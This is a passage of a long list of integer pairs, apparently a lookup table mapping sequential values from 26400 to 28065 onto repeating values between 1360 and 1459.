(26400, 1437),
(26401, 1438),
(26402, 1439),
(26403, 1440),
(26404, 1440),
(26405, 1440),
(26406, 1441),
(26407, 1441),
(26408, 1441),
(26409, 1442),
(26410, 1443),
(26411, 1443),
(26412, 1444),
(26413, 1445),
(26414, 1446),
(26415, 1446),
(26416, 1447),
(26417, 1448),
(26418, 1449),
(26419, 1449),
(26420, 1450),
(26421, 1451),
(26422, 1452),
(26423, 1452),
(26424, 1453),
(26425, 1454),
(26426, 1455),
(26427, 1455),
(26428, 1456),
(26429, 1457),
(26430, 1457),
(26431, 1458),
(26432, 1459),
(26433, 1459),
(26434, 1360),
(26435, 1360),
(26436, 1360),
(26437, 1360),
(26438, 1360),
(26439, 1360),
(26440, 1360),
(26441, 1361),
(26442, 1361),
(26443, 1361),
(26444, 1361),
(26445, 1361),
(26446, 1361),
(26447, 1361),
(26448, 1361),
(26449, 1361),
(26450, 1361),
(26451, 1361),
(26452, 1362),
(26453, 1362),
(26454, 1362),
(26455, 1362),
(26456, 1362),
(26457, 1362),
(26458, 1362),
(26459, 1363),
(26460, 1363),
(26461, 1363),
(26462, 1363),
(26463, 1363),
(26464, 1363),
(26465, 1363),
(26466, 1364),
(26467, 1364),
(26468, 1364),
(26469, 1364),
(26470, 1364),
(26471, 1364),
(26472, 1364),
(26473, 1365),
(26474, 1365),
(26475, 1365),
(26476, 1365),
(26477, 1365),
(26478, 1365),
(26479, 1365),
(26480, 1366),
(26481, 1366),
(26482, 1366),
(26483, 1366),
(26484, 1366),
(26485, 1366),
(26486, 1366),
(26487, 1367),
(26488, 1367),
(26489, 1367),
(26490, 1367),
(26491, 1367),
(26492, 1367),
(26493, 1367),
(26494, 1368),
(26495, 1368),
(26496, 1368),
(26497, 1368),
(26498, 1368),
(26499, 1368),
(26500, 1368),
(26501, 1369),
(26502, 1369),
(26503, 1369),
(26504, 1369),
(26505, 1369),
(26506, 1369),
(26507, 1369),
(26508, 1370),
(26509, 1370),
(26510, 1370),
(26511, 1370),
(26512, 1370),
(26513, 1370),
(26514, 1370),
(26515, 1371),
(26516, 1371),
(26517, 1371),
(26518, 1371),
(26519, 1371),
(26520, 1371),
(26521, 1371),
(26522, 1372),
(26523, 1372),
(26524, 1372),
(26525, 1372),
(26526, 1372),
(26527, 1372),
(26528, 1372),
(26529, 1373),
(26530, 1373),
(26531, 1373),
(26532, 1373),
(26533, 1373),
(26534, 1373),
(26535, 1373),
(26536, 1374),
(26537, 1374),
(26538, 1374),
(26539, 1374),
(26540, 1374),
(26541, 1374),
(26542, 1374),
(26543, 1375),
(26544, 1375),
(26545, 1375),
(26546, 1375),
(26547, 1375),
(26548, 1375),
(26549, 1375),
(26550, 1376),
(26551, 1376),
(26552, 1376),
(26553, 1376),
(26554, 1376),
(26555, 1376),
(26556, 1376),
(26557, 1377),
(26558, 1377),
(26559, 1377),
(26560, 1377),
(26561, 1377),
(26562, 1377),
(26563, 1377),
(26564, 1377),
(26565, 1377),
(26566, 1377),
(26567, 1377),
(26568, 1378),
(26569, 1378),
(26570, 1378),
(26571, 1378),
(26572, 1378),
(26573, 1378),
(26574, 1378),
(26575, 1379),
(26576, 1379),
(26577, 1379),
(26578, 1379),
(26579, 1379),
(26580, 1379),
(26581, 1379),
(26582, 1380),
(26583, 1380),
(26584, 1380),
(26585, 1380),
(26586, 1380),
(26587, 1380),
(26588, 1380),
(26589, 1381),
(26590, 1381),
(26591, 1381),
(26592, 1381),
(26593, 1381),
(26594, 1381),
(26595, 1381),
(26596, 1382),
(26597, 1382),
(26598, 1382),
(26599, 1382),
(26600, 1382),
(26601, 1382),
(26602, 1382),
(26603, 1383),
(26604, 1383),
(26605, 1383),
(26606, 1383),
(26607, 1383),
(26608, 1383),
(26609, 1383),
(26610, 1384),
(26611, 1384),
(26612, 1384),
(26613, 1384),
(26614, 1384),
(26615, 1384),
(26616, 1384),
(26617, 1385),
(26618, 1385),
(26619, 1385),
(26620, 1385),
(26621, 1385),
(26622, 1385),
(26623, 1385),
(26624, 1386),
(26625, 1386),
(26626, 1386),
(26627, 1386),
(26628, 1386),
(26629, 1386),
(26630, 1386),
(26631, 1387),
(26632, 1387),
(26633, 1387),
(26634, 1387),
(26635, 1387),
(26636, 1387),
(26637, 1387),
(26638, 1388),
(26639, 1388),
(26640, 1388),
(26641, 1388),
(26642, 1388),
(26643, 1388),
(26644, 1388),
(26645, 1389),
(26646, 1389),
(26647, 1389),
(26648, 1389),
(26649, 1389),
(26650, 1389),
(26651, 1389),
(26652, 1390),
(26653, 1390),
(26654, 1390),
(26655, 1390),
(26656, 1390),
(26657, 1390),
(26658, 1390),
(26659, 1391),
(26660, 1391),
(26661, 1391),
(26662, 1391),
(26663, 1391),
(26664, 1391),
(26665, 1391),
(26666, 1392),
(26667, 1392),
(26668, 1392),
(26669, 1392),
(26670, 1392),
(26671, 1392),
(26672, 1392),
(26673, 1393),
(26674, 1393),
(26675, 1393),
(26676, 1393),
(26677, 1393),
(26678, 1393),
(26679, 1393),
(26680, 1393),
(26681, 1393),
(26682, 1393),
(26683, 1393),
(26684, 1394),
(26685, 1394),
(26686, 1394),
(26687, 1394),
(26688, 1394),
(26689, 1394),
(26690, 1394),
(26691, 1395),
(26692, 1395),
(26693, 1395),
(26694, 1395),
(26695, 1395),
(26696, 1395),
(26697, 1395),
(26698, 1396),
(26699, 1396),
(26700, 1396),
(26701, 1396),
(26702, 1396),
(26703, 1396),
(26704, 1396),
(26705, 1397),
(26706, 1397),
(26707, 1397),
(26708, 1397),
(26709, 1397),
(26710, 1397),
(26711, 1397),
(26712, 1398),
(26713, 1398),
(26714, 1398),
(26715, 1398),
(26716, 1398),
(26717, 1398),
(26718, 1398),
(26719, 1399),
(26720, 1399),
(26721, 1399),
(26722, 1399),
(26723, 1399),
(26724, 1399),
(26725, 1399),
(26726, 1400),
(26727, 1400),
(26728, 1400),
(26729, 1400),
(26730, 1400),
(26731, 1400),
(26732, 1400),
(26733, 1401),
(26734, 1401),
(26735, 1401),
(26736, 1401),
(26737, 1401),
(26738, 1401),
(26739, 1401),
(26740, 1402),
(26741, 1402),
(26742, 1402),
(26743, 1402),
(26744, 1402),
(26745, 1402),
(26746, 1402),
(26747, 1403),
(26748, 1403),
(26749, 1403),
(26750, 1403),
(26751, 1403),
(26752, 1403),
(26753, 1403),
(26754, 1404),
(26755, 1404),
(26756, 1404),
(26757, 1404),
(26758, 1404),
(26759, 1404),
(26760, 1404),
(26761, 1405),
(26762, 1405),
(26763, 1405),
(26764, 1405),
(26765, 1405),
(26766, 1405),
(26767, 1405),
(26768, 1406),
(26769, 1406),
(26770, 1406),
(26771, 1406),
(26772, 1406),
(26773, 1406),
(26774, 1406),
(26775, 1407),
(26776, 1407),
(26777, 1407),
(26778, 1407),
(26779, 1407),
(26780, 1407),
(26781, 1407),
(26782, 1408),
(26783, 1408),
(26784, 1408),
(26785, 1408),
(26786, 1408),
(26787, 1408),
(26788, 1408),
(26789, 1409),
(26790, 1409),
(26791, 1409),
(26792, 1409),
(26793, 1409),
(26794, 1409),
(26795, 1409),
(26796, 1409),
(26797, 1409),
(26798, 1409),
(26799, 1409),
(26800, 1410),
(26801, 1410),
(26802, 1410),
(26803, 1410),
(26804, 1410),
(26805, 1410),
(26806, 1410),
(26807, 1411),
(26808, 1411),
(26809, 1411),
(26810, 1411),
(26811, 1411),
(26812, 1411),
(26813, 1411),
(26814, 1412),
(26815, 1412),
(26816, 1412),
(26817, 1412),
(26818, 1412),
(26819, 1412),
(26820, 1412),
(26821, 1413),
(26822, 1413),
(26823, 1413),
(26824, 1413),
(26825, 1413),
(26826, 1413),
(26827, 1413),
(26828, 1414),
(26829, 1414),
(26830, 1414),
(26831, 1414),
(26832, 1414),
(26833, 1414),
(26834, 1414),
(26835, 1415),
(26836, 1415),
(26837, 1415),
(26838, 1415),
(26839, 1415),
(26840, 1415),
(26841, 1415),
(26842, 1416),
(26843, 1416),
(26844, 1416),
(26845, 1416),
(26846, 1416),
(26847, 1416),
(26848, 1416),
(26849, 1417),
(26850, 1417),
(26851, 1417),
(26852, 1417),
(26853, 1417),
(26854, 1417),
(26855, 1417),
(26856, 1418),
(26857, 1418),
(26858, 1418),
(26859, 1418),
(26860, 1418),
(26861, 1418),
(26862, 1418),
(26863, 1419),
(26864, 1419),
(26865, 1419),
(26866, 1419),
(26867, 1419),
(26868, 1419),
(26869, 1419),
(26870, 1420),
(26871, 1420),
(26872, 1420),
(26873, 1420),
(26874, 1420),
(26875, 1420),
(26876, 1420),
(26877, 1421),
(26878, 1421),
(26879, 1421),
(26880, 1421),
(26881, 1421),
(26882, 1421),
(26883, 1421),
(26884, 1422),
(26885, 1422),
(26886, 1422),
(26887, 1422),
(26888, 1422),
(26889, 1422),
(26890, 1422),
(26891, 1423),
(26892, 1423),
(26893, 1423),
(26894, 1423),
(26895, 1423),
(26896, 1423),
(26897, 1423),
(26898, 1424),
(26899, 1424),
(26900, 1424),
(26901, 1424),
(26902, 1424),
(26903, 1424),
(26904, 1424),
(26905, 1425),
(26906, 1425),
(26907, 1425),
(26908, 1425),
(26909, 1425),
(26910, 1425),
(26911, 1425),
(26912, 1425),
(26913, 1425),
(26914, 1425),
(26915, 1425),
(26916, 1426),
(26917, 1426),
(26918, 1426),
(26919, 1426),
(26920, 1426),
(26921, 1426),
(26922, 1426),
(26923, 1427),
(26924, 1427),
(26925, 1427),
(26926, 1427),
(26927, 1427),
(26928, 1427),
(26929, 1427),
(26930, 1428),
(26931, 1428),
(26932, 1428),
(26933, 1428),
(26934, 1428),
(26935, 1428),
(26936, 1428),
(26937, 1429),
(26938, 1429),
(26939, 1429),
(26940, 1429),
(26941, 1429),
(26942, 1429),
(26943, 1429),
(26944, 1430),
(26945, 1430),
(26946, 1430),
(26947, 1430),
(26948, 1430),
(26949, 1430),
(26950, 1430),
(26951, 1431),
(26952, 1431),
(26953, 1431),
(26954, 1431),
(26955, 1431),
(26956, 1431),
(26957, 1431),
(26958, 1432),
(26959, 1432),
(26960, 1432),
(26961, 1432),
(26962, 1432),
(26963, 1432),
(26964, 1432),
(26965, 1433),
(26966, 1433),
(26967, 1433),
(26968, 1433),
(26969, 1433),
(26970, 1433),
(26971, 1433),
(26972, 1434),
(26973, 1434),
(26974, 1434),
(26975, 1434),
(26976, 1434),
(26977, 1434),
(26978, 1434),
(26979, 1435),
(26980, 1435),
(26981, 1435),
(26982, 1435),
(26983, 1435),
(26984, 1435),
(26985, 1435),
(26986, 1436),
(26987, 1436),
(26988, 1436),
(26989, 1436),
(26990, 1436),
(26991, 1436),
(26992, 1436),
(26993, 1437),
(26994, 1437),
(26995, 1437),
(26996, 1437),
(26997, 1437),
(26998, 1437),
(26999, 1437),
(27000, 1438),
(27001, 1438),
(27002, 1438),
(27003, 1438),
(27004, 1438),
(27005, 1438),
(27006, 1438),
(27007, 1439),
(27008, 1439),
(27009, 1439),
(27010, 1439),
(27011, 1439),
(27012, 1439),
(27013, 1439),
(27014, 1440),
(27015, 1440),
(27016, 1440),
(27017, 1440),
(27018, 1440),
(27019, 1440),
(27020, 1440),
(27021, 1441),
(27022, 1441),
(27023, 1441),
(27024, 1441),
(27025, 1441),
(27026, 1441),
(27027, 1441),
(27028, 1441),
(27029, 1441),
(27030, 1441),
(27031, 1441),
(27032, 1442),
(27033, 1442),
(27034, 1442),
(27035, 1442),
(27036, 1442),
(27037, 1442),
(27038, 1442),
(27039, 1443),
(27040, 1443),
(27041, 1443),
(27042, 1443),
(27043, 1443),
(27044, 1443),
(27045, 1443),
(27046, 1444),
(27047, 1444),
(27048, 1444),
(27049, 1444),
(27050, 1444),
(27051, 1444),
(27052, 1444),
(27053, 1445),
(27054, 1445),
(27055, 1445),
(27056, 1445),
(27057, 1445),
(27058, 1445),
(27059, 1445),
(27060, 1446),
(27061, 1446),
(27062, 1446),
(27063, 1446),
(27064, 1446),
(27065, 1446),
(27066, 1446),
(27067, 1447),
(27068, 1447),
(27069, 1447),
(27070, 1447),
(27071, 1447),
(27072, 1447),
(27073, 1447),
(27074, 1448),
(27075, 1448),
(27076, 1448),
(27077, 1448),
(27078, 1448),
(27079, 1448),
(27080, 1448),
(27081, 1449),
(27082, 1449),
(27083, 1449),
(27084, 1449),
(27085, 1449),
(27086, 1449),
(27087, 1449),
(27088, 1450),
(27089, 1450),
(27090, 1450),
(27091, 1450),
(27092, 1450),
(27093, 1450),
(27094, 1450),
(27095, 1451),
(27096, 1451),
(27097, 1451),
(27098, 1451),
(27099, 1451),
(27100, 1451),
(27101, 1451),
(27102, 1452),
(27103, 1452),
(27104, 1452),
(27105, 1452),
(27106, 1452),
(27107, 1452),
(27108, 1452),
(27109, 1453),
(27110, 1453),
(27111, 1453),
(27112, 1453),
(27113, 1453),
(27114, 1453),
(27115, 1453),
(27116, 1454),
(27117, 1454),
(27118, 1454),
(27119, 1454),
(27120, 1454),
(27121, 1454),
(27122, 1454),
(27123, 1455),
(27124, 1455),
(27125, 1455),
(27126, 1455),
(27127, 1455),
(27128, 1455),
(27129, 1455),
(27130, 1456),
(27131, 1456),
(27132, 1456),
(27133, 1456),
(27134, 1456),
(27135, 1456),
(27136, 1456),
(27137, 1457),
(27138, 1457),
(27139, 1457),
(27140, 1457),
(27141, 1457),
(27142, 1457),
(27143, 1457),
(27144, 1457),
(27145, 1457),
(27146, 1457),
(27147, 1457),
(27148, 1458),
(27149, 1458),
(27150, 1458),
(27151, 1458),
(27152, 1458),
(27153, 1458),
(27154, 1458),
(27155, 1459),
(27156, 1459),
(27157, 1459),
(27158, 1459),
(27159, 1459),
(27160, 1459),
(27161, 1459),
(27162, 1360),
(27163, 1361),
(27164, 1362),
(27165, 1363),
(27166, 1364),
(27167, 1365),
(27168, 1366),
(27169, 1367),
(27170, 1368),
(27171, 1369),
(27172, 1370),
(27173, 1371),
(27174, 1372),
(27175, 1373),
(27176, 1374),
(27177, 1375),
(27178, 1376),
(27179, 1377),
(27180, 1378),
(27181, 1379),
(27182, 1380),
(27183, 1381),
(27184, 1382),
(27185, 1383),
(27186, 1384),
(27187, 1385),
(27188, 1386),
(27189, 1387),
(27190, 1388),
(27191, 1389),
(27192, 1390),
(27193, 1391),
(27194, 1392),
(27195, 1393),
(27196, 1394),
(27197, 1395),
(27198, 1396),
(27199, 1397),
(27200, 1398),
(27201, 1399),
(27202, 1400),
(27203, 1401),
(27204, 1402),
(27205, 1403),
(27206, 1404),
(27207, 1405),
(27208, 1406),
(27209, 1407),
(27210, 1408),
(27211, 1409),
(27212, 1410),
(27213, 1411),
(27214, 1412),
(27215, 1413),
(27216, 1414),
(27217, 1415),
(27218, 1416),
(27219, 1417),
(27220, 1418),
(27221, 1419),
(27222, 1420),
(27223, 1421),
(27224, 1422),
(27225, 1423),
(27226, 1424),
(27227, 1425),
(27228, 1426),
(27229, 1427),
(27230, 1428),
(27231, 1429),
(27232, 1430),
(27233, 1431),
(27234, 1432),
(27235, 1433),
(27236, 1434),
(27237, 1435),
(27238, 1436),
(27239, 1437),
(27240, 1438),
(27241, 1439),
(27242, 1440),
(27243, 1441),
(27244, 1442),
(27245, 1443),
(27246, 1444),
(27247, 1445),
(27248, 1446),
(27249, 1447),
(27250, 1448),
(27251, 1449),
(27252, 1450),
(27253, 1451),
(27254, 1452),
(27255, 1453),
(27256, 1454),
(27257, 1455),
(27258, 1456),
(27259, 1457),
(27260, 1458),
(27261, 1459),
(27262, 1360),
(27263, 1360),
(27264, 1360),
(27265, 1360),
(27266, 1360),
(27267, 1360),
(27268, 1361),
(27269, 1361),
(27270, 1361),
(27271, 1361),
(27272, 1361),
(27273, 1361),
(27274, 1361),
(27275, 1361),
(27276, 1361),
(27277, 1362),
(27278, 1362),
(27279, 1362),
(27280, 1362),
(27281, 1362),
(27282, 1362),
(27283, 1363),
(27284, 1363),
(27285, 1363),
(27286, 1363),
(27287, 1363),
(27288, 1363),
(27289, 1364),
(27290, 1364),
(27291, 1364),
(27292, 1364),
(27293, 1364),
(27294, 1364),
(27295, 1365),
(27296, 1365),
(27297, 1365),
(27298, 1365),
(27299, 1365),
(27300, 1365),
(27301, 1366),
(27302, 1366),
(27303, 1366),
(27304, 1366),
(27305, 1366),
(27306, 1366),
(27307, 1367),
(27308, 1367),
(27309, 1367),
(27310, 1367),
(27311, 1367),
(27312, 1367),
(27313, 1368),
(27314, 1368),
(27315, 1368),
(27316, 1368),
(27317, 1368),
(27318, 1368),
(27319, 1369),
(27320, 1369),
(27321, 1369),
(27322, 1369),
(27323, 1369),
(27324, 1369),
(27325, 1370),
(27326, 1370),
(27327, 1370),
(27328, 1370),
(27329, 1370),
(27330, 1370),
(27331, 1371),
(27332, 1371),
(27333, 1371),
(27334, 1371),
(27335, 1371),
(27336, 1371),
(27337, 1372),
(27338, 1372),
(27339, 1372),
(27340, 1372),
(27341, 1372),
(27342, 1372),
(27343, 1373),
(27344, 1373),
(27345, 1373),
(27346, 1373),
(27347, 1373),
(27348, 1373),
(27349, 1374),
(27350, 1374),
(27351, 1374),
(27352, 1374),
(27353, 1374),
(27354, 1374),
(27355, 1375),
(27356, 1375),
(27357, 1375),
(27358, 1375),
(27359, 1375),
(27360, 1375),
(27361, 1376),
(27362, 1376),
(27363, 1376),
(27364, 1376),
(27365, 1376),
(27366, 1376),
(27367, 1377),
(27368, 1377),
(27369, 1377),
(27370, 1377),
(27371, 1377),
(27372, 1377),
(27373, 1377),
(27374, 1377),
(27375, 1377),
(27376, 1378),
(27377, 1378),
(27378, 1378),
(27379, 1378),
(27380, 1378),
(27381, 1378),
(27382, 1379),
(27383, 1379),
(27384, 1379),
(27385, 1379),
(27386, 1379),
(27387, 1379),
(27388, 1380),
(27389, 1380),
(27390, 1380),
(27391, 1380),
(27392, 1380),
(27393, 1380),
(27394, 1381),
(27395, 1381),
(27396, 1381),
(27397, 1381),
(27398, 1381),
(27399, 1381),
(27400, 1382),
(27401, 1382),
(27402, 1382),
(27403, 1382),
(27404, 1382),
(27405, 1382),
(27406, 1383),
(27407, 1383),
(27408, 1383),
(27409, 1383),
(27410, 1383),
(27411, 1383),
(27412, 1384),
(27413, 1384),
(27414, 1384),
(27415, 1384),
(27416, 1384),
(27417, 1384),
(27418, 1385),
(27419, 1385),
(27420, 1385),
(27421, 1385),
(27422, 1385),
(27423, 1385),
(27424, 1386),
(27425, 1386),
(27426, 1386),
(27427, 1386),
(27428, 1386),
(27429, 1386),
(27430, 1387),
(27431, 1387),
(27432, 1387),
(27433, 1387),
(27434, 1387),
(27435, 1387),
(27436, 1388),
(27437, 1388),
(27438, 1388),
(27439, 1388),
(27440, 1388),
(27441, 1388),
(27442, 1389),
(27443, 1389),
(27444, 1389),
(27445, 1389),
(27446, 1389),
(27447, 1389),
(27448, 1390),
(27449, 1390),
(27450, 1390),
(27451, 1390),
(27452, 1390),
(27453, 1390),
(27454, 1391),
(27455, 1391),
(27456, 1391),
(27457, 1391),
(27458, 1391),
(27459, 1391),
(27460, 1392),
(27461, 1392),
(27462, 1392),
(27463, 1392),
(27464, 1392),
(27465, 1392),
(27466, 1393),
(27467, 1393),
(27468, 1393),
(27469, 1393),
(27470, 1393),
(27471, 1393),
(27472, 1393),
(27473, 1393),
(27474, 1393),
(27475, 1394),
(27476, 1394),
(27477, 1394),
(27478, 1394),
(27479, 1394),
(27480, 1394),
(27481, 1395),
(27482, 1395),
(27483, 1395),
(27484, 1395),
(27485, 1395),
(27486, 1395),
(27487, 1396),
(27488, 1396),
(27489, 1396),
(27490, 1396),
(27491, 1396),
(27492, 1396),
(27493, 1397),
(27494, 1397),
(27495, 1397),
(27496, 1397),
(27497, 1397),
(27498, 1397),
(27499, 1398),
(27500, 1398),
(27501, 1398),
(27502, 1398),
(27503, 1398),
(27504, 1398),
(27505, 1399),
(27506, 1399),
(27507, 1399),
(27508, 1399),
(27509, 1399),
(27510, 1399),
(27511, 1400),
(27512, 1400),
(27513, 1400),
(27514, 1400),
(27515, 1400),
(27516, 1400),
(27517, 1401),
(27518, 1401),
(27519, 1401),
(27520, 1401),
(27521, 1401),
(27522, 1401),
(27523, 1402),
(27524, 1402),
(27525, 1402),
(27526, 1402),
(27527, 1402),
(27528, 1402),
(27529, 1403),
(27530, 1403),
(27531, 1403),
(27532, 1403),
(27533, 1403),
(27534, 1403),
(27535, 1404),
(27536, 1404),
(27537, 1404),
(27538, 1404),
(27539, 1404),
(27540, 1404),
(27541, 1405),
(27542, 1405),
(27543, 1405),
(27544, 1405),
(27545, 1405),
(27546, 1405),
(27547, 1406),
(27548, 1406),
(27549, 1406),
(27550, 1406),
(27551, 1406),
(27552, 1406),
(27553, 1407),
(27554, 1407),
(27555, 1407),
(27556, 1407),
(27557, 1407),
(27558, 1407),
(27559, 1408),
(27560, 1408),
(27561, 1408),
(27562, 1408),
(27563, 1408),
(27564, 1408),
(27565, 1409),
(27566, 1409),
(27567, 1409),
(27568, 1409),
(27569, 1409),
(27570, 1409),
(27571, 1409),
(27572, 1409),
(27573, 1409),
(27574, 1410),
(27575, 1410),
(27576, 1410),
(27577, 1410),
(27578, 1410),
(27579, 1410),
(27580, 1411),
(27581, 1411),
(27582, 1411),
(27583, 1411),
(27584, 1411),
(27585, 1411),
(27586, 1412),
(27587, 1412),
(27588, 1412),
(27589, 1412),
(27590, 1412),
(27591, 1412),
(27592, 1413),
(27593, 1413),
(27594, 1413),
(27595, 1413),
(27596, 1413),
(27597, 1413),
(27598, 1414),
(27599, 1414),
(27600, 1414),
(27601, 1414),
(27602, 1414),
(27603, 1414),
(27604, 1415),
(27605, 1415),
(27606, 1415),
(27607, 1415),
(27608, 1415),
(27609, 1415),
(27610, 1416),
(27611, 1416),
(27612, 1416),
(27613, 1416),
(27614, 1416),
(27615, 1416),
(27616, 1417),
(27617, 1417),
(27618, 1417),
(27619, 1417),
(27620, 1417),
(27621, 1417),
(27622, 1418),
(27623, 1418),
(27624, 1418),
(27625, 1418),
(27626, 1418),
(27627, 1418),
(27628, 1419),
(27629, 1419),
(27630, 1419),
(27631, 1419),
(27632, 1419),
(27633, 1419),
(27634, 1420),
(27635, 1420),
(27636, 1420),
(27637, 1420),
(27638, 1420),
(27639, 1420),
(27640, 1421),
(27641, 1421),
(27642, 1421),
(27643, 1421),
(27644, 1421),
(27645, 1421),
(27646, 1422),
(27647, 1422),
(27648, 1422),
(27649, 1422),
(27650, 1422),
(27651, 1422),
(27652, 1423),
(27653, 1423),
(27654, 1423),
(27655, 1423),
(27656, 1423),
(27657, 1423),
(27658, 1424),
(27659, 1424),
(27660, 1424),
(27661, 1424),
(27662, 1424),
(27663, 1424),
(27664, 1425),
(27665, 1425),
(27666, 1425),
(27667, 1425),
(27668, 1425),
(27669, 1425),
(27670, 1425),
(27671, 1425),
(27672, 1425),
(27673, 1426),
(27674, 1426),
(27675, 1426),
(27676, 1426),
(27677, 1426),
(27678, 1426),
(27679, 1427),
(27680, 1427),
(27681, 1427),
(27682, 1427),
(27683, 1427),
(27684, 1427),
(27685, 1428),
(27686, 1428),
(27687, 1428),
(27688, 1428),
(27689, 1428),
(27690, 1428),
(27691, 1429),
(27692, 1429),
(27693, 1429),
(27694, 1429),
(27695, 1429),
(27696, 1429),
(27697, 1430),
(27698, 1430),
(27699, 1430),
(27700, 1430),
(27701, 1430),
(27702, 1430),
(27703, 1431),
(27704, 1431),
(27705, 1431),
(27706, 1431),
(27707, 1431),
(27708, 1431),
(27709, 1432),
(27710, 1432),
(27711, 1432),
(27712, 1432),
(27713, 1432),
(27714, 1432),
(27715, 1433),
(27716, 1433),
(27717, 1433),
(27718, 1433),
(27719, 1433),
(27720, 1433),
(27721, 1434),
(27722, 1434),
(27723, 1434),
(27724, 1434),
(27725, 1434),
(27726, 1434),
(27727, 1435),
(27728, 1435),
(27729, 1435),
(27730, 1435),
(27731, 1435),
(27732, 1435),
(27733, 1436),
(27734, 1436),
(27735, 1436),
(27736, 1436),
(27737, 1436),
(27738, 1436),
(27739, 1437),
(27740, 1437),
(27741, 1437),
(27742, 1437),
(27743, 1437),
(27744, 1437),
(27745, 1438),
(27746, 1438),
(27747, 1438),
(27748, 1438),
(27749, 1438),
(27750, 1438),
(27751, 1439),
(27752, 1439),
(27753, 1439),
(27754, 1439),
(27755, 1439),
(27756, 1439),
(27757, 1440),
(27758, 1440),
(27759, 1440),
(27760, 1440),
(27761, 1440),
(27762, 1440),
(27763, 1441),
(27764, 1441),
(27765, 1441),
(27766, 1441),
(27767, 1441),
(27768, 1441),
(27769, 1441),
(27770, 1441),
(27771, 1441),
(27772, 1442),
(27773, 1442),
(27774, 1442),
(27775, 1442),
(27776, 1442),
(27777, 1442),
(27778, 1443),
(27779, 1443),
(27780, 1443),
(27781, 1443),
(27782, 1443),
(27783, 1443),
(27784, 1444),
(27785, 1444),
(27786, 1444),
(27787, 1444),
(27788, 1444),
(27789, 1444),
(27790, 1445),
(27791, 1445),
(27792, 1445),
(27793, 1445),
(27794, 1445),
(27795, 1445),
(27796, 1446),
(27797, 1446),
(27798, 1446),
(27799, 1446),
(27800, 1446),
(27801, 1446),
(27802, 1447),
(27803, 1447),
(27804, 1447),
(27805, 1447),
(27806, 1447),
(27807, 1447),
(27808, 1448),
(27809, 1448),
(27810, 1448),
(27811, 1448),
(27812, 1448),
(27813, 1448),
(27814, 1449),
(27815, 1449),
(27816, 1449),
(27817, 1449),
(27818, 1449),
(27819, 1449),
(27820, 1450),
(27821, 1450),
(27822, 1450),
(27823, 1450),
(27824, 1450),
(27825, 1450),
(27826, 1451),
(27827, 1451),
(27828, 1451),
(27829, 1451),
(27830, 1451),
(27831, 1451),
(27832, 1452),
(27833, 1452),
(27834, 1452),
(27835, 1452),
(27836, 1452),
(27837, 1452),
(27838, 1453),
(27839, 1453),
(27840, 1453),
(27841, 1453),
(27842, 1453),
(27843, 1453),
(27844, 1454),
(27845, 1454),
(27846, 1454),
(27847, 1454),
(27848, 1454),
(27849, 1454),
(27850, 1455),
(27851, 1455),
(27852, 1455),
(27853, 1455),
(27854, 1455),
(27855, 1455),
(27856, 1456),
(27857, 1456),
(27858, 1456),
(27859, 1456),
(27860, 1456),
(27861, 1456),
(27862, 1457),
(27863, 1457),
(27864, 1457),
(27865, 1457),
(27866, 1457),
(27867, 1457),
(27868, 1457),
(27869, 1457),
(27870, 1457),
(27871, 1458),
(27872, 1458),
(27873, 1458),
(27874, 1458),
(27875, 1458),
(27876, 1458),
(27877, 1459),
(27878, 1459),
(27879, 1459),
(27880, 1459),
(27881, 1459),
(27882, 1459),
(27883, 1360),
(27884, 1360),
(27885, 1361),
(27886, 1362),
(27887, 1362),
(27888, 1363),
(27889, 1363),
(27890, 1364),
(27891, 1364),
(27892, 1365),
(27893, 1365),
(27894, 1366),
(27895, 1366),
(27896, 1367),
(27897, 1367),
(27898, 1368),
(27899, 1368),
(27900, 1369),
(27901, 1369),
(27902, 1370),
(27903, 1370),
(27904, 1371),
(27905, 1371),
(27906, 1372),
(27907, 1372),
(27908, 1373),
(27909, 1373),
(27910, 1374),
(27911, 1374),
(27912, 1375),
(27913, 1375),
(27914, 1376),
(27915, 1376),
(27916, 1377),
(27917, 1378),
(27918, 1378),
(27919, 1379),
(27920, 1379),
(27921, 1380),
(27922, 1380),
(27923, 1381),
(27924, 1381),
(27925, 1382),
(27926, 1382),
(27927, 1383),
(27928, 1383),
(27929, 1384),
(27930, 1384),
(27931, 1385),
(27932, 1385),
(27933, 1386),
(27934, 1386),
(27935, 1387),
(27936, 1387),
(27937, 1388),
(27938, 1388),
(27939, 1389),
(27940, 1389),
(27941, 1390),
(27942, 1390),
(27943, 1391),
(27944, 1391),
(27945, 1392),
(27946, 1392),
(27947, 1393),
(27948, 1394),
(27949, 1394),
(27950, 1395),
(27951, 1395),
(27952, 1396),
(27953, 1396),
(27954, 1397),
(27955, 1397),
(27956, 1398),
(27957, 1398),
(27958, 1399),
(27959, 1399),
(27960, 1400),
(27961, 1400),
(27962, 1401),
(27963, 1401),
(27964, 1402),
(27965, 1402),
(27966, 1403),
(27967, 1403),
(27968, 1404),
(27969, 1404),
(27970, 1405),
(27971, 1405),
(27972, 1406),
(27973, 1406),
(27974, 1407),
(27975, 1407),
(27976, 1408),
(27977, 1408),
(27978, 1409),
(27979, 1410),
(27980, 1410),
(27981, 1411),
(27982, 1411),
(27983, 1412),
(27984, 1412),
(27985, 1413),
(27986, 1413),
(27987, 1414),
(27988, 1414),
(27989, 1415),
(27990, 1415),
(27991, 1416),
(27992, 1416),
(27993, 1417),
(27994, 1417),
(27995, 1418),
(27996, 1418),
(27997, 1419),
(27998, 1419),
(27999, 1420),
(28000, 1420),
(28001, 1421),
(28002, 1421),
(28003, 1422),
(28004, 1422),
(28005, 1423),
(28006, 1423),
(28007, 1424),
(28008, 1424),
(28009, 1425),
(28010, 1426),
(28011, 1426),
(28012, 1427),
(28013, 1427),
(28014, 1428),
(28015, 1428),
(28016, 1429),
(28017, 1429),
(28018, 1430),
(28019, 1430),
(28020, 1431),
(28021, 1431),
(28022, 1432),
(28023, 1432),
(28024, 1433),
(28025, 1433),
(28026, 1434),
(28027, 1434),
(28028, 1435),
(28029, 1435),
(28030, 1436),
(28031, 1436),
(28032, 1437),
(28033, 1437),
(28034, 1438),
(28035, 1438),
(28036, 1439),
(28037, 1439),
(28038, 1440),
(28039, 1440),
(28040, 1441),
(28041, 1442),
(28042, 1442),
(28043, 1443),
(28044, 1443),
(28045, 1444),
(28046, 1444),
(28047, 1445),
(28048, 1445),
(28049, 1446),
(28050, 1446),
(28051, 1447),
(28052, 1447),
(28053, 1448),
(28054, 1448),
(28055, 1449),
(28056, 1449),
(28057, 1450),
(28058, 1450),
(28059, 1451),
(28060, 1451),
(28061, 1452),
(28062, 1452),
(28063, 1453),
(28064, 1453),
(28065, 1454),
